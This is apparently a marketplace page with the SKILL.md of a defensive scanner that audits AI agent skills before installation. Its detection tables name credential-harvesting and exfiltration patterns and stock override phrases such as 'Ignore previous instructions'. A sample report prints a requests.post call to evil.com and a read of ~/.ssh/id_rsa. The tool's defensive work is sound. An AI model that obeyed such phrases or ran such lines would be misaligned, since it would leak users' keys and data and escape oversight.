Agent Skills: Skill Security Auditor

Scan and audit AI agent skills for security risks before installation. Produces a

UncategorizedID: aaaaqwq/claude-code-skills/skill-security-auditor

Install this agent skill to your local

pnpm dlx add-skill https://github.com/aAAaqwq/AGI-Super-Team/tree/HEAD/skills/skill-security-auditor

Skill Files

Browse the full folder contents for skill-security-auditor.

Download Skill

Loading file tree…

skills/skill-security-auditor/SKILL.md

Skill Metadata

Name
skill-security-auditor
Description
Scan and audit AI agent skills for security risks before installation. Produces a

Skill Security Auditor

Scan and audit AI agent skills for security risks before installation. Produces a clear PASS / WARN / FAIL verdict with findings and remediation guidance.

Quick Start

# Audit a local skill directory
python3 scripts/skill_security_auditor.py /path/to/skill-name/

# Audit a skill from a git repo
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name

# Audit with strict mode (any WARN becomes FAIL)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict

# Output JSON report
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json

What Gets Scanned

1. Code Execution Risks (Python/Bash Scripts)

Scans all .py, .sh, .bash, .js, .ts files for:

| Category | Patterns Detected | Severity | |----------|-------------------|----------| | Command injection | os.system(), os.popen(), subprocess.call(shell=True), backtick execution | πŸ”΄ CRITICAL | | Code execution | eval(), exec(), compile(), __import__() | πŸ”΄ CRITICAL | | Obfuscation | base64-encoded payloads, codecs.decode, hex-encoded strings, chr() chains | πŸ”΄ CRITICAL | | Network exfiltration | requests.post(), urllib.request, socket.connect(), httpx, aiohttp | πŸ”΄ CRITICAL | | Credential harvesting | reads from ~/.ssh, ~/.aws, ~/.config, env var extraction patterns | πŸ”΄ CRITICAL | | File system abuse | writes outside skill dir, /etc/, ~/.bashrc, ~/.profile, symlink creation | 🟑 HIGH | | Privilege escalation | sudo, chmod 777, setuid, cron manipulation | πŸ”΄ CRITICAL | | Unsafe deserialization | pickle.loads(), yaml.load() (without SafeLoader), marshal.loads() | 🟑 HIGH | | Subprocess (safe) | subprocess.run() with list args, no shell | βšͺ INFO |

2. Prompt Injection in SKILL.md

Scans SKILL.md and all .md reference files for:

| Pattern | Example | Severity | |---------|---------|----------| | System prompt override | "Ignore previous instructions", "You are now..." | πŸ”΄ CRITICAL | | Role hijacking | "Act as root", "Pretend you have no restrictions" | πŸ”΄ CRITICAL | | Safety bypass | "Skip safety checks", "Disable content filtering" | πŸ”΄ CRITICAL | | Hidden instructions | Zero-width characters, HTML comments with directives | 🟑 HIGH | | Excessive permissions | "Run any command", "Full filesystem access" | 🟑 HIGH | | Data extraction | "Send contents of", "Upload file to", "POST to" | πŸ”΄ CRITICAL |

3. Dependency Supply Chain

For skills with requirements.txt, package.json, or inline pip install:

| Check | What It Does | Severity | |-------|-------------|----------| | Known vulnerabilities | Cross-reference with PyPI/npm advisory databases | πŸ”΄ CRITICAL | | Typosquatting | Flag packages similar to popular ones (e.g., reqeusts) | 🟑 HIGH | | Unpinned versions | Flag requests>=2.0 vs requests==2.31.0 | βšͺ INFO | | Install commands in code | pip install or npm install inside scripts | 🟑 HIGH | | Suspicious packages | Low download count, recent creation, single maintainer | βšͺ INFO |

4. File System & Structure

| Check | What It Does | Severity | |-------|-------------|----------| | Boundary violation | Scripts referencing paths outside skill directory | 🟑 HIGH | | Hidden files | .env, dotfiles that shouldn't be in a skill | 🟑 HIGH | | Binary files | Unexpected executables, .so, .dll, .exe | πŸ”΄ CRITICAL | | Large files | Files >1MB that could hide payloads | βšͺ INFO | | Symlinks | Symbolic links pointing outside skill directory | πŸ”΄ CRITICAL |

Audit Workflow

  1. Run the scanner on the skill directory or repo URL
  2. Review the report β€” findings grouped by severity
  3. Verdict interpretation:
    • βœ… PASS β€” No critical or high findings. Safe to install.
    • ⚠️ WARN β€” High/medium findings detected. Review manually before installing.
    • ❌ FAIL β€” Critical findings. Do NOT install without remediation.
  4. Remediation β€” each finding includes specific fix guidance

Reading the Report

╔══════════════════════════════════════════════╗
β•‘  SKILL SECURITY AUDIT REPORT                β•‘
β•‘  Skill: example-skill                        β•‘
β•‘  Verdict: ❌ FAIL                            β•‘
╠══════════════════════════════════════════════╣
β•‘  πŸ”΄ CRITICAL: 2  🟑 HIGH: 1  βšͺ INFO: 3    β•‘
β•šβ•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•β•

πŸ”΄ CRITICAL [CODE-EXEC] scripts/helper.py:42
   Pattern: eval(user_input)
   Risk: Arbitrary code execution from untrusted input
   Fix: Replace eval() with ast.literal_eval() or explicit parsing

πŸ”΄ CRITICAL [NET-EXFIL] scripts/analyzer.py:88
   Pattern: requests.post("https://evil.com/collect", data=results)
   Risk: Data exfiltration to external server
   Fix: Remove outbound network calls or verify destination is trusted

🟑 HIGH [FS-BOUNDARY] scripts/scanner.py:15
   Pattern: open(os.path.expanduser("~/.ssh/id_rsa"))
   Risk: Reads SSH private key outside skill scope
   Fix: Remove filesystem access outside skill directory

βšͺ INFO [DEPS-UNPIN] requirements.txt:3
   Pattern: requests>=2.0
   Risk: Unpinned dependency may introduce vulnerabilities
   Fix: Pin to specific version: requests==2.31.0

Advanced Usage

Audit a Skill from Git Before Cloning

# Clone to temp dir, audit, then clean up
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup

CI/CD Integration

# GitHub Actions step
- name: Audit Skill Security
  run: |
    python3 skill-security-auditor/scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
    if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi

Batch Audit

# Audit all skills in a directory
for skill in skills/*/; do
  python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done

Threat Model Reference

For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see references/threat-model.md.

Limitations

  • Cannot detect logic bombs or time-delayed payloads with certainty
  • Obfuscation detection is pattern-based β€” a sufficiently creative attacker may bypass it
  • Network destination reputation checks require internet access
  • Does not execute code β€” static analysis only (safe but less complete than dynamic analysis)
  • Dependency vulnerability checks use local pattern matching, not live CVE databases

When in doubt after an audit, don't install. Ask the skill author for clarification.